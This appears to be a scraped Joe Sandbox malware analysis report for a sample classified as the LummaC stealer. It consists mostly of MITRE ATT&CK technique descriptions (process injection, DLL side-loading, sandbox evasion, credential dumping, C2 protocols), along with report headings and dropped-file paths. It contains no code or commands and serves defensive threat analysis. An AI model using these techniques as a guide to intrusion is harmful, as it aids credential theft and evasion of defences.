Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qnUFsmyxMm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe

C:\Users\user\AppData\Local\Temp\d5f90697

C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe (copy)

C:\Users\user\AppData\Roaming\ColorStreamLib\is-96L6E.tmp

Static File Info

General

Windows Analysis Report
qnUFsmyxMm.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre